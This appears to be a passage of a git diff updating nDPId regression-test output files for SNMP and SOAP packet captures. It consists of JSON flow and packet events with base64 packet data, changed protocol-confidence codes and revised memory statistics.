00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1597328765050,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":262,"pkt_l4_len":228,"thread_ts_msec":1597328765050,"pkt":"AAwpbM85AAAAgfGMCABFAAD4AAkAAP8R+958NcSwZ\/gWL9QuAKIA5B3\/MIHZAgEDMA0CASkCAgXcBAEAAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgIJyQQMTk9BVVRITk9QUklWBAAEADCBmQQMgAAACQMAqrvMAAEABACngYYCATACAQACAQAwezAPBggrBgECAQEDAEMDA9QeMBcGCisGAQYDAQEEAQAGCSsGAQYDAQEFBDAPBgorBgECAQICAQECAgECMBkGCisGAQIBAgIBAgIEC0V0aGVybmV0MC8xMA8GCisGAQIBAgIBAwICAQYwEgYMKwYBBAEJAgIBARQCBAJ1cA=="} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":63,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":7038,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":4,"total-updates":0,"current-active-flows":4,"total-active-flows":15,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":90,"global_ts_msec":1643702947966} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702947966,"flow_last_seen":1643702947966,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1643702947966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":231,"pkt_l4_len":193,"thread_ts_msec":1643702947966,"pkt":"AAAAAAAAAAEAAAAIgQADjAgARcAA1To\/AABAETBgCucChgpI9wQAoe6gAMF5TzCCALUCAQEEBGFkc2yiggCoAgJkLgIBEwIBATCCAJowggCWBg8rBgEEAa1zWwEBAQEBDwEEgYJCR01QAQAAAAAAAAEwMDAwMDAAAAAAAAAAAAAAAABSMS42MS4xMi4wMAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAQAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702947966,"flow_last_seen":1643702947966,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702947966,"flow_last_seen":1643702947966,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597328648399,"flow_last_seen":1597328660640,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328704045,"flow_last_seen":1597328710051,"flow_idle_time":200000,"flow_min_l4_payload_len":230,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328757701,"flow_last_seen":1597328765050,"flow_idle_time":200000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328734790,"flow_last_seen":1597328742081,"flow_idle_time":200000,"flow_min_l4_payload_len":241,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328704045,"flow_last_seen":1597328710051,"flow_idle_time":200000,"flow_min_l4_payload_len":230,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328757701,"flow_last_seen":1597328765050,"flow_idle_time":200000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328734790,"flow_last_seen":1597328742081,"flow_idle_time":200000,"flow_min_l4_payload_len":241,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1643702958965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":231,"pkt_l4_len":193,"thread_ts_msec":1643702958965,"pkt":"AAAAAAAAAAEAAAAIgQADjAgARcAA1fKQAABAEXgOCucChgpI9wQAoe6gAMFeTzCCALUCAQEEBGFkc2yiggCoAgJkSQIBEwIBATCCAJowggCWBg8rBgEEAa1zWwEBAQEBDwEEgYJCR01QAQAAAAAAAAEwMDAwMDAAAAAAAAAAAAAAAABSMS42MS4xMi4wMAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAQAA"} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1643702975965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":231,"pkt_l4_len":193,"thread_ts_msec":1643702975965,"pkt":"AAAAAAAAAAEAAAAIgQADjAgARcAA1RJZAABAEVhGCucChgpI9wQAoe6gAME\/TzCCALUCAQEEBGFkc2yiggCoAgJkaAIBEwIBATCCAJowggCWBg8rBgEEAa1zWwEBAQEBDwEEgYJCR01QAQAAAAAAAAEwMDAwMDAAAAAAAAAAAAAAAABSMS42MS4xMi4wMAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAQAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702987695,"flow_last_seen":1643702987695,"flow_idle_time":200000,"flow_min_l4_payload_len":1097,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":1097,"midstream":0,"thread_ts_msec":1643702987695,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1643702987695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1143,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1143,"pkt_l4_len":1105,"thread_ts_msec":1643702987695,"pkt":"AAAAAAAAAAUAAAAIgQAFHAgARQAEZQAAQAA7ESDXCmMIWApk\/ZKo6gChBFEqBzCCBEUCAQEEBnB1YmxpY6CCBDYCBCYSfb8CAQACAQAwggQmMA8GCysGAQIBHwEBAQZkBQAwDwYLKwYBAgEfAQEBCmwFADAPBgsrBgECAR8BAQEKBgUAMA8GCysGAQIBHwEBAQYLBQAwDwYLKwYBAgEfAQEBBk4FADAPBgsrBgECAR8BAQEGXQUAMA8GCysGAQIBHwEBAQpFBQAwDwYLKwYBAgEfAQEBCgEFADAPBgsrBgECAWMBAQEEEQUAMBAGDCsGAQIBHwEBAQaBAAUAMA8GCysGAQIBHwEBAQoDBQAwDwYLKwYBAgEfAQEBBmMFADAQBgwrBgECAR8BAQEKgRAFADAPBgsrBgECAR8BAQEGSAUAMA8GCysGAQIBHwEBAQoWBQAwDwYLKwYBAgFjAQEBBBMFADAPBgsrBgECAR8BAQEKRwUAMBAGDCsGAQIBHwEBAQaBCQUAMA8GCysGAQIBHwEBAQYCBQAwDwYLKwYBAgEfAQEBCkwFADAPBgsrBgECAR8BAQEKXgUAMA8GCysGAQIBHwEBAQpvBQAwDwYLKwYBAgEfAQEBCmEFADAPBgsrBgECAR8BAQEKOAUAMA8GCysGAQIBHwEBAQo\/BQAwDwYLKwYBAgEfAQEBBnYFADAPBgsrBgECAR8BAQEKFAUAMA8GCysGAQIBHwEBAQZfBQAwDwYLKwYBAgEfAQEBCkIFADAPBgsrBgECAR8BAQEKXwUAMA8GCysGAQIBHwEBAQZgBQAwEAYMKwYBAgEfAQEBCoEOBQAwEAYMKwYBAgEfAQEBBoELBQAwDwYLKwYBAgEfAQEBCjcFADAPBgsrBgECAR8BAQEKRgUAMBAGDCsGAQIBHwEBAQqBBwUAMBAGDCsGAQIBHwEBAQqETAUAMBAGDCsGAQIBHwEBAQqBDAUAMA8GCysGAQIBHwEBAQZHBQAwDwYLKwYBAgEfAQEBBlgFADAPBgsrBgECAR8BAQEGPQUAMA8GCysGAQIBHwEBAQZuBQAwDwYLKwYBAgEfAQEBBj4FADAPBgsrBgECAR8BAQEGUAUAMA8GCysGAQIBHwEBAQZpBQAwDwYLKwYBAgEfAQEBBnoFADAPBgsrBgECAR8BAQEKfwUAMA8GCysGAQIBHwEBAQZeBQAwDwYLKwYBAgEfAQEBBhQFADAPBgsrBgECAR8BAQEKTQUAMA8GCysGAQIBHwEBAQYEBQAwDwYLKwYBAgEfAQEBCjwFADAPBgsrBgECAR8BAQEKCgUAMA8GCysGAQIBHwEBAQYPBQAwDwYLKwYBAgEfAQEBBnsFADAPBgsrBgECAR8BAQEKeAUAMA8GCysGAQIBHwEBAQZUBQAwDwYLKwYBAgEfAQEBClUFADAPBgsrBgECAR8BAQEKewUAMA8GCysGAQIBHwEBAQZlBQAwDwYLKwYBAgEfAQEBBksFADAPBgsrBgECAR8BAQEGUgUA"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702987695,"flow_last_seen":1643702987695,"flow_idle_time":200000,"flow_min_l4_payload_len":1097,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":1097,"midstream":0,"thread_ts_msec":1643702987695,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702987695,"flow_last_seen":1643702987695,"flow_idle_time":200000,"flow_min_l4_payload_len":1097,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":1097,"midstream":0,"thread_ts_msec":1643702987695,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1643702987761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":75,"pkt_l4_len":37,"thread_ts_msec":1643702987761,"pkt":"AAAAAAAAAAUAAAAIgQAFHAgARQAAOaWFAAA+Ebx9CmT9kgpjCFgAoajqACXVjjAbAgEBBAZwdWJsaWOiDgIEJhJ9vwIBAQIBADAA"} -00648{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643702987695,"flow_last_seen":1643702987761,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1643702987761,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643702987695,"flow_last_seen":1643702987761,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1643702987761,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 01195{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1643702987763,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":611,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":611,"pkt_l4_len":573,"thread_ts_msec":1643702987763,"pkt":"AAAAAAAAAAUAAAAIgQAFHAgARQACUQAAQAA7ESLrCmMIWApk\/ZKo6gChAj3MpjCCAjECAQEEBnB1YmxpY6CCAiICBCYSfcACAQACAQAwggISMA8GCysGAQIBHwEBAQZkBQAwDwYLKwYBAgEfAQEBCmwFADAPBgsrBgECAR8BAQEKBgUAMA8GCysGAQIBHwEBAQYLBQAwDwYLKwYBAgEfAQEBBk4FADAPBgsrBgECAR8BAQEGXQUAMA8GCysGAQIBHwEBAQpFBQAwDwYLKwYBAgEfAQEBCgEFADAPBgsrBgECAWMBAQEEEQUAMBAGDCsGAQIBHwEBAQaBAAUAMA8GCysGAQIBHwEBAQoDBQAwDwYLKwYBAgEfAQEBBmMFADAQBgwrBgECAR8BAQEKgRAFADAPBgsrBgECAR8BAQEGSAUAMA8GCysGAQIBHwEBAQoWBQAwDwYLKwYBAgFjAQEBBBMFADAPBgsrBgECAR8BAQEKRwUAMBAGDCsGAQIBHwEBAQaBCQUAMA8GCysGAQIBHwEBAQYCBQAwDwYLKwYBAgEfAQEBCkwFADAPBgsrBgECAR8BAQEKXgUAMA8GCysGAQIBHwEBAQpvBQAwDwYLKwYBAgEfAQEBCmEFADAPBgsrBgECAR8BAQEKOAUAMA8GCysGAQIBHwEBAQo\/BQAwDwYLKwYBAgEfAQEBBnYFADAPBgsrBgECAR8BAQEKFAUAMA8GCysGAQIBHwEBAQZfBQAwDwYLKwYBAgEfAQEBCkIFADAPBgsrBgECAR8BAQEKXwUAMA8GCysGAQIBHwEBAQZgBQA="} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1643702987695,"flow_last_seen":1643702987801,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":3593,"flow_avg_l4_payload_len":598,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1643702947966,"flow_last_seen":1643703001963,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1643702987695,"flow_last_seen":1643702987801,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":3593,"flow_avg_l4_payload_len":598,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1643702947966,"flow_last_seen":1643703001963,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":72,"packets-processed":72,"total-skipped-flows":0,"total-l4-payload-len":11371,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":17,"total-detection-updates":5,"total-updates":0,"current-active-flows":0,"total-active-flows":17,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":108,"global_ts_msec":1643703001963} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 72/72 @@ -114,9 +114,9 @@ ~~ total active/idle flows...: 17/17 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5888406 bytes -~~ total memory freed........: 5888406 bytes -~~ total allocations/frees...: 118248/118248 +~~ total memory allocated....: 6022040 bytes +~~ total memory freed........: 6022040 bytes +~~ total allocations/frees...: 121010/121010 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1911 chars diff --git a/test/results/soap.pcap.out b/test/results/soap.pcap.out index eac05ca5a..edd4524a0 100644 --- a/test/results/soap.pcap.out +++ b/test/results/soap.pcap.out @@ -4,19 +4,19 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946731321416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946731321416,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Js1AAH8GJUPAqAJkFwLVpcO0AFABqrpoAAAAAIAC+vBEVAAAAgQFtAEDAwgBAQQC"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946731321441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946731321441,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAADwGjxAXAtWlwKgCZABQw7Tpz83XAaq6aYAS+vCMpAAAAgQFrAEBBAIBAwMH"} 02386{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946731323902,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946731323902,"pkt":"eJS0JASgYDjgxTWgCABFAAXUJtJAAH8GH57AqAJkFwLVpcO0AFABqsQz6c\/N2FAYAQQJEwAAOAAwADAAMAAtADAAMAA4ADAANQBmADkAYgAzADQAZgBiAH0AXwBWAEkARAAmAGEAbQBwADsAMAAwADAAMQAwADAANQA3AF8AUABJAEQAJgBhAG0AcAA7ADAAMAAyADMAPAAvAGgAdwBpAGQAPgA8AGgAdwBpAGQAPgBEAE8ASQBEADoAQgBUAEgARQBOAFUATQBcAHsAMAAwADAAMAAxADgAMAAxAC0AMAAwADAAMAAtADEAMAAwADAALQA4ADAAMAAwAC0AMAAwADgAMAA1AGYAOQBiADMANABmAGIAfQBfAFYASQBEACYAYQBtAHAAOwAwADAAMAAxADAAMAA1ADcAXwBQAEkARAAmAGEAbQBwADsAMAAwADIAMwA8AC8AaAB3AGkAZAA+ADwAaAB3AGkAZAA+AEQATwBJAEQAOgBCAFQASABFAE4AVQBNAFwAewAwADAAMAAwADEAMQAwAGIALQAwADAAMAAwAC0AMQAwADAAMAAtADgAMAAwADAALQAwADAAOAAwADUAZgA5AGIAMwA0AGYAYgB9AF8ATABPAEMAQQBMAE0ARgBHACYAYQBtAHAAOwAwADAAMAAyADwALwBoAHcAaQBkAD4APABoAHcAaQBkAD4ARABPAEkARAA6AEIAVABIAEUATgBVAE0AXAB7ADAAMAAwADAAMQAxADAAMQAtADAAMAAwADAALQAxADAAMAAwAC0AOAAwADAAMAAtADAAMAA4ADAANQBmADkAYgAzADQAZgBiAH0AXwBMAE8AQwBBAEwATQBGAEcAJgBhAG0AcAA7ADAAMAAwADIAPAAvAGgAdwBpAGQAPgA8AGgAdwBpAGQAPgBEAE8ASQBEADoAQgBUAEgARQBOAFUATQBcAHsAMAAwADAAMAAxADEAMABjAC0AMAAwADAAMAAtADEAMAAwADAALQA4ADAAMAAwAC0AMAAwADgAMAA1AGYAOQBiADMANABmAGIAfQBfAEwATwBDAEEATABNAEYARwAmAGEAbQBwADsAMAAwADAAMgA8AC8AaAB3AGkAZAA+ADwAaAB3AGkAZAA+AEQATwBJAEQAOgBCAFQASABFAE4AVQBNAFwAewAwADAAMAAwADEAMQAwAGUALQAwADAAMAAwAC0AMQAwADAAMAAtADgAMAAwADAALQAwADAAOAAwADUAZgA5AGIAMwA0AGYAYgB9AF8ATABPAEMAQQBMAE0ARgBHACYAYQBtAHAAOwAwADAAMAAyADwALwBoAHcAaQBkAD4APABoAHcAaQBkAD4ARABPAEkARAA6AEIAVABIAEUATgBVAE0AXAB7ADAAMAAwADAAMQAxADEAZQAtADAAMAAwADAALQAxADAAMAAwAC0AOAAwADAAMAAtADAAMAA4ADAANQBmADkAYgAzADQAZgBiAH0AXwBMAE8AQwBBAEwATQBGAEcAJgBhAG0AcAA7ADAAMAAwADIAPAAvAGgAdwBpAGQAPgA8AGgAdwBpAGQAPgBEAE8ASQBEADoAQgBUAEgARQBOAFUATQBcAHsAMAAwADAAMAAxADgAMAAxAC0AMAAwADAAMAAtADEAMAAwADAALQA4ADAAMAAwAC0AMAAwADgAMAA1AGYAOQBiADMANABmAGIAfQBfAEwATwBDAEEATABNAEYAR